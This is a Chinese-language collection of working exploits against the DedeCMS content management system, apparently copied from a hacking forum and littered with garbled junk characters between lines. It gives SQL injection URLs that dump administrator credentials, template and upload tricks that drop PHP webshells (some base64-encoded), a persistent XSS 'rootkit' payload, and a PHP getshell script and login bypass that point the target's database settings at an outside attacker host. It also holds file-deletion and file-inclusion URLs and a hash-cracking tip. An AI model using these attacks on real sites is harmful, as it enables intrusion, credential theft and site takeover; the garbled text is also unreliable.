|
|
( c5 p" ^) N+ h( u
Dedecms 5.6 rss注入漏洞
* H! g" V! E& vhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
+ n3 s4 M, b7 `' m
( y6 z7 t# |3 s1 p" Y' K- o$ V2 k
8 z/ T# X6 u7 A% ] m% d0 }6 i. W9 v1 A. |
' M% m. e6 X; j. H
3 q) b, o. g' n& {0 H% f: B+ [9 H2 W
' v: s# L3 b5 g T! @/ e! d
/ L" z. V) e( V4 [DedeCms v5.6 嵌入恶意代码执行漏洞
7 f; M- Z0 e6 A8 @, u注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}9 R7 k4 H B- o% j9 y3 {
发表后查看或修改即可执行' ?; e) h# T- _
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
$ u8 p4 a1 h, b生成x.php 密码xiao,直接生成一句话。( W) ]( w4 F; ?0 X8 s
( h% {0 t, d1 r
" k8 c3 J& Q* k4 {$ l! B
( y* _) Y, Q+ b' ?
3 a& [. K y9 B4 Z5 ?/ v
/ E: y% ^- ?. D7 {
/ P, G5 c7 ^& o, E3 n# {7 Q- s% ]' v8 R. m
$ f4 m% [; d* Z9 i$ D, mDede 5.6 GBK SQL注入漏洞
/ s W4 T! ?: u8 K" X! A, ~http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';: T# G- e1 B! Y# ^5 w
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe x& R8 \+ j( P+ W, q7 m o. F& u# \. E6 A
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
2 c7 `: j* R8 K" q" h
1 P+ f% Y0 n. B5 c% Q% H
9 Z1 Y+ P1 G! w5 k: M7 F& }% H4 S6 O4 w) c: o; x
& l1 t2 |7 L: @+ `) R* a- Y" i8 N0 q7 e$ K$ \4 K" T
9 O* h8 E" p& {* X9 G" _
) C$ K2 F1 M% w3 n. p3 V: F: q! J4 J) H
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
' W3 S/ d! e; s( P2 R! P" z1 t3 Jhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` . x& a- {2 U+ a1 E4 P
9 q* i H/ c4 q/ P4 O2 M
, x$ X' u) b' M5 B, M/ }* h1 k7 b" B$ b( N' s1 d1 p6 Q F9 N9 A
& P( @3 ^' R9 R: N: h
/ L0 [( W6 w9 Y' L% f7 G. v8 L1 b0 Q6 z L% ?- ]
DEDECMS 全版本 gotopage变量XSS漏洞
* m( [( j7 R7 Q. M1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 + Y, V, }) C& k+ a- ]0 N& W! M, Q
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="3 b' }; n4 q5 `2 t
1 o- h# G7 t8 I- r
$ r1 a9 R; E. y* q8 G5 |
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
[4 G) u2 w' K# \http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
9 W# _0 W# W- n3 D5 K) _/ n' s. g$ z2 T- I2 E4 M
8 S' b k0 d0 I% z1 {: [/ V- Ihttp://v57.demo.dedecms.com/dede/login.php
$ K- W; u5 x8 N
6 Y) H Y9 D% d. ^
5 r. T) S1 C3 T7 v5 j5 Icolor=Red]DeDeCMS(织梦)变量覆盖getshell+ }7 @* m4 r5 Z" c" n/ k
#!usr/bin/php -w8 d6 H# g4 w+ d* m* k
<?php- d V7 Q- f2 |7 M) ~6 M
error_reporting(E_ERROR);
9 p J! q! E& sset_time_limit(0);( l0 F2 v! j8 x& k- ~- |; ]
print_r('% w. K' z) F, S( }4 k R
DEDEcms Variable Coverage
. Y, b+ o/ N5 Q P! zExploit Author: www.heixiaozi.comwww.webvul.com7 B5 h, M% L* P) |) G1 f
);8 x- V4 x! B( q- m
echo "\r\n";
7 b" A( X+ O( X$ l( dif($argv[2]==null){
9 S& s. M. _2 }- h+ R0 Xprint_r('
6 H$ B1 L# J9 X3 Z& @' z( s+---------------------------------------------------------------------------+
; E( y4 C1 M1 w1 D! UUsage: php '.$argv[0].' url aid path
- L% g! o( |/ R& w0 Kaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
* h' z4 q+ y& L( S! @+ d7 jExample:
d$ f( e* _' j6 dphp '.$argv[0].' www.site.com 1 old
. ?% ]# W5 w+ [$ f& K+---------------------------------------------------------------------------+
V$ R. ~7 \3 X7 I5 d');
& n$ C2 ~ t+ wexit;2 Y! {& k9 p; e" ]0 f6 d N
}
# S9 w$ b) [5 h' l3 t8 \! E. M$url=$argv[1];
" O1 ~5 N, L/ ~3 X$aid=$argv[2];# E. f7 B, s% Q ` W/ ]! B
$path=$argv[3];( j0 _6 d* [; ^. R* Q* q. Q
$exp=Getshell($url,$aid,$path);
- Q6 P- ?3 q3 b5 x5 P5 ?$ @if (strpos($exp,"OK")>12){
T. [' l6 O9 m( Wecho "
- M( e6 i+ e0 Y; H& S# `Exploit Success \n";
, ]- ^$ W) `1 R [ ?if($aid==1)echo "
. s% ^- z6 C- h; `Shell:".$url."/$path/data/cache/fuck.php\n" ;
4 ?. \3 [! `. n. D' o2 `2 J
! m$ D2 y8 p5 p {
) S8 Z4 k1 k' Kif($aid==2)echo "- D& T8 f+ N/ m+ y. b' U) P5 O
Shell:".$url."/$path/fuck.php\n" ;
: I& q, f) Y. z8 C( Q; L8 }7 K& x
$ s9 V$ \- E2 y, {+ Y7 l+ M3 ?) ]3 U9 P
if($aid==3)echo "3 v8 m v; L d) K0 e
Shell:".$url."/$path/plus/fuck.php\n";
4 X5 z* F7 d( ^% A/ G, |, t
( s6 Y y- t8 J2 a# ]
/ s; j% n! x" ]" `}else{0 Y# \' I/ C: N8 M: j
echo "
' {8 l* ?+ T! i* u, f; |& HExploit Failed \n";
9 B3 h' }6 @$ j7 r$ B. B# B/ t0 C}, `# v1 A" @; n& ?1 O& n
function Getshell($url,$aid,$path){
. k% M: e4 }4 Y$id=$aid;
7 u: [# C. w& j+ g$host=$url;$ l8 |5 ]& G( R" n" S! `, @
$port="80";
$ F5 H$ P$ Y1 l3 V5 n$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
, r7 K6 q' I+ h' a7 D" [( R+ ?$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
- j( v* x5 y" l7 Z9 y( A' E$data .= "Host: ".$host."\r\n";/ z# J9 s3 s' u
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";% ~' _- ]* x% V. @# \; a
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";$ e, W2 M) [& y5 B: N' E- G( w
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
}# z" G. B- r3 n//$data .= "Accept-Encoding: gzip,deflate\r\n";
& l a5 n7 Q ?* ~2 M5 ~$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";" t& r7 y5 u" I
$data .= "Connection: keep-alive\r\n";! t. x) y7 Q9 g4 o$ a
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
- \! U5 g8 F: t4 F m4 _+ t) J8 P$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
( r: H: I0 z$ }( f- w/ V2 v0 E+ o+ l3 m$data .= $content."\r\n";
% I0 D* U7 s- N h }; Z$ock=fsockopen($host,$port);1 r# `' c) }) D( P3 e( p
if (!$ock) {
4 o. A4 G. z; Hecho "& x) F, ?: M( B: Y7 A7 y, l
No response from ".$host."\n";- \2 ]0 @. D" B4 F
}
7 } E8 r0 m& ?& C) S( B1 ifwrite($ock,$data);/ P1 S9 J; Z) i, u0 ?
while (!feof($ock)) {
! M. q- B4 s2 ?9 C$exp=fgets($ock, 1024);
# B' x S% @, x8 sreturn $exp;
2 e; ?$ y! p: t9 y" Q}
/ G. D- U1 R: p) Q& B# ]}
. C4 u( q0 Z$ T4 I6 t8 a7 |: h
' r; G2 E' h* F: W! X( `3 D3 g4 \* I: n/ Z
?>
1 S0 p0 A9 a: \- T& ^# W! V
. J) v+ @9 c, x% S
" q! M9 P+ ^& \. k
2 s& D; z6 x6 T3 X& _6 {6 c: }3 v, f) W) ?3 b) ]1 S# i* I7 j' J
4 n1 X6 S; R+ a$ C( `; B
- H) D" K: H, I$ g9 q" t4 ^8 r# r" n" y% s \, w0 H2 j! P& }; v1 v
/ t- I& A: q+ Y8 X1 I4 I( d, e% T5 c8 {: a1 X9 m5 R4 X
3 y) B7 z( J0 J/ x% H% b( R/ P
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)+ `$ B- H: a+ H- U2 E) `
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root/ I6 ?) p P/ }0 J+ c
; v9 O5 J; Q- p8 P7 \$ s0 S8 a9 x* a# ]* w/ x
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
5 J F) N/ l5 u3 u* @1 h' Q; o {8 P% p% a9 `# j" Z1 G
5 n* \) f0 t9 v2 y) ? G' \
此漏洞的前提是必须得到后台路径才能实现& @! H* U* ?" n; D" ?7 `
: x3 Z* }. Y; q) U* j$ R
9 Q1 i1 y1 X0 a% A, k7 q z
* w+ r' C8 y6 g' t2 m5 ]
' ~3 M: D, r# F# ^- K* }
+ N X3 I: `7 ^6 e, Y9 y9 \$ R/ y/ I9 \
* |8 L. e9 @' W/ w( Y% J* L0 ?4 B: m. D4 y8 i: t7 x
3 n: Y8 r) ~ z( a
$ I. A/ j4 U/ [( K: fDedecms织梦 标签远程文件写入漏洞8 n, z4 N7 J+ i! M
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
k0 X. U7 y5 {6 d4 @! ~& q
& K3 P& v9 L1 R
7 Q4 a5 F+ S8 M# \8 D, s) d再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 ' D6 C* O- A4 h- B! v
<form action="" method="post" name="QuickSearch" id="QuickSearch">
3 f1 m# @2 e, z4 {& I0 O8 ?<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
. b; ]; D9 l( @, f7 B<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
+ h# F3 r# j- R0 ~4 @# ?8 m<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />8 f* S& x6 d7 Z9 W* k3 m# @
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
0 N7 {+ K# g+ l# t% K) V, Q3 u<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />1 m8 j" M- Q+ E
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
8 R7 K6 t0 f+ E, f' X& k<input type="text" value="true" name="nocache" style="width:400">
# E, M" ^" F# s; Z0 C& T<input type="submit" value="提交" name="QuickSearchBtn"><br />( }5 s9 A0 q. v$ Y S# C9 j* H
</form>! E( E5 X4 f+ l" ~( z
<script>
( F2 Q3 V) h9 k7 L8 efunction addaction()4 M7 Z" j! r' H% H+ m
{' H. a; }% O: v' S3 q& l) ~$ M
document.QuickSearch.action=document.QuickSearch.doaction.value;
9 ~- n; k7 X% P6 s- M}
! D; y$ i& ?; P: S4 G0 D, j! o# ^</script>
! i" g$ L% _( n$ `/ H% Y2 e1 j# E6 ]+ C7 u i
$ N7 U, C- W3 j7 m& H$ C! ^5 M1 c3 I
2 W9 F6 D1 X* j& \* Q4 z0 ~" V+ W; r* D& }) M" B) k* b. F
5 w9 _5 I" P# @
- T. p6 _2 {" l5 d( x
. q0 d @8 k+ @8 E% h
8 A, V' O0 [# s: O# n% U
: Y! \' U& T% I( rDedeCms v5.6 嵌入恶意代码执行漏洞0 e/ f7 d% V; l4 {! g% w/ O5 a
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行# Y( P4 C4 L, A
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
+ q$ L2 S7 C4 `) o2 k生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得6 G% B! E3 J; q
Dedecms <= V5.6 Final模板执行漏洞6 [4 n* s+ l4 }9 A+ T
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:" ~6 d& n2 E. U) t( H8 H$ n
uploads/userup/2/12OMX04-15A.jpg9 B" D$ _& k @
# l; T; y! s' Y* N8 ^# T' }
( `; ]% X ?- Z! }模板内容是(如果限制图片格式,加gif89a):
( h+ ~! i9 ?2 I; r+ r/ {{dede:name runphp='yes'}5 [/ Z; ]- O1 n( D, K
$fp = @fopen("1.php", 'a');
' p, t' D0 }2 m& O" F0 k9 D@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");( f5 [" a* }& u3 S2 N5 G9 ^/ |+ b) h4 R
@fclose($fp);" ?8 B5 M1 y q' R6 m! L6 T8 u/ S
{/dede:name}
) j& w+ q6 K" M2 修改刚刚发表的文章,查看源文件,构造一个表单:6 e' q9 S# k4 \5 @
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
( i, q1 R; J. I" w<input type="hidden" name="dopost" value="save" />
9 g/ w2 M( N0 M# o* ]<input type="hidden" name="aid" value="2" />
0 p- a. ]' Q$ ^0 B<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
2 [3 `2 S) Z( f) O- y7 }$ g' I<input type="hidden" name="channelid" value="1" />
" K9 D. c$ {0 H( d0 X. ]4 R9 k<input type="hidden" name="oldlitpic" value="" />
6 R$ w+ B3 P' j+ |+ R5 I: b; L<input type="hidden" name="sortrank" value="1275972263" />- ]% W( H& G; z. |6 F
5 v# g5 |* n1 b6 k; u0 n& D- Z) r/ S( u8 F
<div id="mainCp">
2 u9 m5 s* H/ W" g" g5 M<h3 class="meTitle"><strong>修改文章</strong></h3>5 e1 v' u! e2 g( l. b
+ q3 D8 ~' f5 k" _" y) B# c, B8 d4 k* ^$ s1 U# |6 S, \8 {" r( o, t
<div class="postForm"> Z4 K6 m; p) M! z8 [
<label>标题:</label>9 O% I7 \8 |/ C, f
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
- h# B; x" T. G+ E4 H; J# A
+ y& U1 S( K c5 t* k: k
) V$ T8 g- F7 Q2 y<label>标签TAG:</label>
: E4 {: \: \4 B<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)9 K% u, P" Y1 ^4 c; J
% h- W& a( f7 t5 ]( [
7 G- z: I- w" N, L8 F" [
<label>作者:</label>- f. d3 F+ R7 e' I' `
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>! j' T/ @. b: U. o/ p/ v
# o. a8 n m3 ?4 r
" N3 ?- _9 ^5 z1 w. A; P<label>隶属栏目:</label>- l- w0 e- {' U2 c v+ z
<select name='typeid' size='1'>9 ~* L9 ~- {0 x( O4 c3 a. [
<option value='1' class='option3' selected=''>测试栏目</option>
% D" v- t' X6 D. U a</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
$ V0 x/ S4 j5 X! c+ \. _6 K; X& ?( Y$ O- \# T V$ E, x
; `* P1 V0 ]0 U) Z<label>我的分类:</label>7 ^8 w+ j5 U' O6 b
<select name='mtypesid' size='1'>2 t( F* l8 j% c0 B
<option value='0' selected>请选择分类...</option>9 k& K$ ^& S9 M! y, R8 g9 g. U
<option value='1' class='option3' selected>hahahha</option>0 ^; q" H& ?; A+ M9 H
</select># _: p) A: K( b% z. _
) s% ~8 |1 d# N; j. t: c; W! L
( V6 D3 P r. @# Z
<label>信息摘要:</label>+ v' `( G0 Z7 W% P
<textarea name="description" id="description">1111111</textarea>. e7 e/ R9 B: G* M
(内容的简要说明)0 b8 O b3 [8 @. F0 U3 i/ U
0 T3 x. ~/ Z0 O
. Q2 V3 X' h' C5 E
<label>缩略图:</label>
2 u Y1 s4 A# I+ B+ M<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>. b8 N. y, L6 S/ X& t3 D
$ z0 ]) S) H% g w L% D) W7 \
, d6 A! O2 L& a/ y* s" G6 _9 |7 u<input type='text' name='templet'7 ]: y6 n1 V) R+ v: L0 w2 Z0 \3 t
value="../ uploads/userup/2/12OMX04-15A.jpg">2 a* `, I% Q! ]3 z% _9 ]- [
<input type='text' name='dede_addonfields'
2 E9 a0 \5 j6 }/ d& xvalue="templet,htmltext;">(这里构造)
* r8 R0 Z: t+ B: B</div>
/ S/ ]+ _! e7 g3 o0 j/ W# ?2 {8 ?3 d# h( K& U
3 q; N; E. q' j- I<!-- 表单操作区域 -->! w5 W4 `; \* V, ]; \' l. i4 N
<h3 class="meTitle">详细内容</h3>
$ w9 @) [+ S0 B! r, o- k0 Y- K
) g0 ?9 ?) _1 h3 T1 A# B ^; v4 q
<div class="contentShow postForm">
4 T8 `. p* B: J' k<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>* E4 Y( q7 l: j
. z- K4 j. k# {0 k
& x% ^5 P8 J1 {/ r5 |<label>验证码:</label>3 c" ]( B2 l1 v% w9 D- |$ O
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />/ ~2 y4 _& c+ v3 g0 V9 t
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />! G$ `3 A, g: Y, e$ R E. y
, R+ \' ~2 k3 @. N2 S2 f, {$ W5 Y% J) e2 j& B; }9 S1 D2 Q2 h
<button class="button2" type="submit">提交</button>
8 v H0 ^. E' U<button class="button2 ml10" type="reset">重置</button>3 `4 {4 A# z" \4 d. Q- t
</div>
7 y8 D: i' U9 K |% | }
' q8 ^7 d. E- L" P% k E! _: g
/ |/ Q; U) b" j0 x) v</div>
6 c$ F+ q0 i9 C( D+ r& t: C4 K" J$ [4 p
" p# L( W1 h3 H" j3 ~% d- D
</form>$ j) A( ]& A/ ~9 L. U$ m/ Q# l
/ q- [8 B+ C5 X; K% Q1 S" F
+ i# y, G2 U2 ^- D0 o提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
3 ], w) \8 E6 |& `" {假设刚刚修改的文章的aid为2,则我们只需要访问:. p) e& R# R% W
http://127.0.0.1/dede/plus/view.php?aid=2
- [ P# u! _) B/ G9 [1 U即可以在plus目录下生成webshell:1.php3 x. d9 Y+ F a8 `& K
: v: [8 ~ J4 y
, Y: W. w6 T) w, Z. E6 U& d! W
' `6 Z' a& d2 `5 m" Y* j W4 q# F& o5 x( `
2 }& X+ L7 ]% |1 |3 s; m+ F" e; i
1 u2 ?$ ~' l: [8 e
& l, k+ {2 Y% Y/ s1 p k) {, s
: n( N& V8 p4 x' N
% U. _% g1 h- ^+ u2 X. d
7 O' W0 o+ Y4 |% F$ c) R+ F& k2 V3 W7 Y. }' Y% n* k
) ^3 d: r, h& c( P4 T" o( z& nDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)$ Y9 M; g" e( J9 T3 ^# d& a
Gif89a{dede:field name='toby57' runphp='yes'}0 Z5 Z; s$ y$ a
phpinfo();$ Y; ]4 a Q! u- g
{/dede:field}
: z5 Q; {: f9 H3 u" L/ t; J保存为1.gif! s* o$ C/ p. z. z5 a1 C: |" A
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 4 g' ?9 Q* g! h3 U3 Q
<input type="hidden" name="aid" value="7" /> . y, H b1 M7 E: R
<input type="hidden" name="mediatype" value="1" /> # Y' [4 R0 _+ J9 x# [# u2 c
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
8 F9 [0 W7 P2 v<input type="hidden" name="dopost" value="save" /> : f( H* X L+ b8 F' `/ c
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
, K2 O6 l8 b6 v- G<input name="addonfile" type="file" id="addonfile"/> 8 }8 h) G9 k) h1 u. \8 _/ W5 r
<button class="button2" type="submit" >更改</button> / r! J6 ]6 C' J1 z% p2 j6 u7 j
</form> " s$ g' z! m2 ^+ Q
3 J7 @/ N& |& m6 N+ P' S( U4 b" Z. V& l
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
" o% s; U/ L# N: H6 w发表文章,然后构造修改表单如下:
: s9 p0 H* A1 }+ o# i7 r7 l( Z) Y
+ t" v3 D" U- ?/ o' V g! z+ ?/ Q" _6 }: M' ^
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> # D$ ?" }2 u4 e% M
<input type="hidden" name="dopost" value="save" />
9 {' A1 Q1 e, O; G<input type="hidden" name="aid" value="2" /> ' s3 Z+ f w2 L7 ]! c
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> ! Y$ u* k o l" @8 H/ l
<input type="hidden" name="channelid" value="1" />
1 b. t1 n3 M( q ]! l- Y5 H$ q+ q4 R<input type="hidden" name="oldlitpic" value="" />
- ?8 j X- y8 D# T8 ?<input type="hidden" name="sortrank" value="1282049150" /> , _1 ^* [6 T" a( q$ Q2 L" J, v8 d3 z3 [
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
! W7 O: V' ?! b- e; w4 Y<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
V; o/ i8 L- h" T$ ^<select name='typeid' size='1'> ) c: r8 z% Q" \! j) @
<option value='1' class='option3' selected=''>Test</option> ! p2 Q2 o. _+ y3 K2 H L
<select name='mtypesid' size='1'> * @& G; b" p) K- o3 b( k5 e/ y2 _( P
<option value='0' selected>请选择分类...</option>
9 h. h- H. [; n1 L<option value='1' class='option3' selected>aa</option></select>
6 P; T" G0 o" j: m<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 9 r) K2 y8 Z( ~ p. ]# h' j
<input type='hidden' name='dede_addonfields' value="templet"> 1 P1 J7 ?% O! A" J
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 7 P. h, k' o0 x6 U7 W# X7 X
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 0 `, ?- Q, Z- j0 C( v5 M
<button class="button2" type="submit">提交</button>
* m$ c7 f' ?" ?" C' L4 n6 o</form>- r$ w _) v" H) W& f4 h
0 B- [) p/ Y/ q- e2 c& ?1 t3 X4 C1 Z6 U' Y
7 u* H5 p" d6 J8 s. C; M
0 `/ _5 `+ l& q
4 y( |4 d$ U) r& F
$ M/ |$ [ |, J
9 I6 c9 u# T- O: S$ w& J# {3 I: p- C1 B' C! g7 z
/ x4 Q5 F4 |' |4 D$ h4 E% ?1 I9 e
6 h0 p# C) t3 ^, _" @7 u+ M% \* n9 ~) V: C
{- `. H. L- R7 }8 C
织梦(Dedecms)V5.6 远程文件删除漏洞
4 C- j3 x; x! qhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif' h5 Y; H$ e3 o, [) q
2 b/ Z# a( u; C! D/ A+ N$ D; {
1 h' A5 N! _4 y7 |% g2 T
Z+ A; @0 Z: Q, W- R6 F" M1 |1 F* c. W2 K
# g& Y; Q$ L" ?% T6 ]3 ~
: G& ]. G6 A5 A" U. w3 e z6 C) K6 ^" K
1 V2 R" X/ y- n! Y7 E: k: H0 x: P D
f2 ]3 D! g* Y. I5 ?0 q
. m4 ^! H( k% G/ T
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 7 p6 y6 N2 }- [% t. q& }* Y% U
http://www.test.com/plus/carbuya ... urn&code=../../: i+ C1 F) L2 K t
) [, U3 J P$ X1 z3 a8 ] b
5 ^7 }( b2 o ~. I8 D( @ i/ s! ~! K. ]! _; g1 {: k5 k: j& k
( W: J4 {2 H0 \ M# R
# y1 g) i3 v8 i$ U
. A! U7 U, `( T6 l, d! y2 g5 M- M+ x
2 T4 F0 J# W8 f/ E7 V5 E
2 ]; Z( Q* N5 N; s1 f% @; C) \* j6 r4 r$ R4 ~. E: z3 ^
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
" v, j+ m2 Y5 F, ?8 Uplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`3 D# X7 u% v' [2 R! k
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD55 Y6 |% C! S. G3 x& _
N+ ]! A3 j$ e. N$ l9 {& C
# A, b, x% v- y
1 p) ^' @, n! |, R+ N( }" |- v
. G5 u0 a1 c3 M: n; D8 F6 S8 N) F( e4 \4 e
" Q2 O& G. y6 u. r( z
8 a. @* ]6 M/ _* N
9 L+ Z8 q( I; Z3 V6 F; z+ q
, Q) I" n5 W. S' R9 ~6 [ V
% Z! J4 J- w, _9 D2 ~0 ~织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
5 p5 S: g0 t4 l/ @( a0 k2 b0 v; t5 bhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='$ \( B6 a1 r0 Y; a
8 R* n! k" L5 `& w+ n, [
3 ?* \. A4 N8 Z/ c, V; k* q( e& B& T t/ }
. M3 j# s+ x5 W( m$ H. g$ V- z$ j( z" p( H
. c; A4 n; f" f: B4 X
' m% {- v: [: w* c' Q; @' Y$ I' G0 g. _4 K2 S+ Z
y, i2 k' U) J# q+ O! W! P% ]* I* H% Q: Y7 d1 Y
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞2 g$ \; ]+ y ]4 }
<html>+ I$ a2 J5 U& s3 M! R/ B. m9 ^
<head>
6 M0 g+ G; ]- E* h$ Y7 e- e0 X9 q<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
